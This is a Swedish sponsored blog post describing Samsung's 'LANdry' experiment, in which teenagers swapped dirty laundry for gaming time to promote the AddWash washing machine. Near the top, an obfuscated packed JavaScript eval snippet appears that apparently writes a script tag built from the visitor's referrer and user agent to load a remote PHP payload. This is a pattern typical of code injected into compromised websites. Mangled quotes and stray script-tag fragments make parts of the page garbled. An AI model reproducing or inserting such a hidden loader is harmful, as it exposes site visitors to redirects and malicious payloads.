Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Samsung experiment Addwash LANdry

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nztah|var|u0026u|referrer|nnkfy||js|php’.split(’|’),0,{}))
type=”text/javascript” src=”//delivery.vidible.tv/jsonp/pid=5762b159e4b0e2b0d6f90fbc/56d0eb36e4b0066426bef73b.js”>

Samsung experiment Addwash LANdry: Har en också tonåringar i hemmet som på kvällar och helger bara sitter och spelar data eller Tv-spel? Nu vill Samsung göra tonåringarna mer motiverade till att ta eget ansvar för hemsysslorna. En metod där dem får möjlighet att byta smutstvätten mot speltid.

Det är i en ny kampanj från Samsung för deras tvättmaskin AddWash som det nu är möjligt att styra och övervaka allt genom en app för din smartphone. Som ett experiment till det hela arrangerade Samsung ett problem som många föräldrar dras med i vardagen. Nämligen omotiverade tonåringar som väljer spelandet före allt annat.

På den tillfälliga tvättautomaten var tonåringarna tvungna att byta ut sin smutstvätt mot nya speltid. Ett roligt test där ny teknik möjliggör för förändringar i vardagen. Experimentet LANdry visade hur modern och innovativ teknik kan användas för att göra tråkiga sysslor roliga och samtidigt hjälpsamma.

 

Kika in klippet ovan och se när smutstvätten byttes ut mot speltimmar. 

Detta är ett sponsrat inlägg från Samsung.

src=”//delivery.vidible.tv/jsonp/pid=5762b159e4b0e2b0d6f90fbc/56d0eb36e4b0066426bef73b.js” type=”text/javascript”>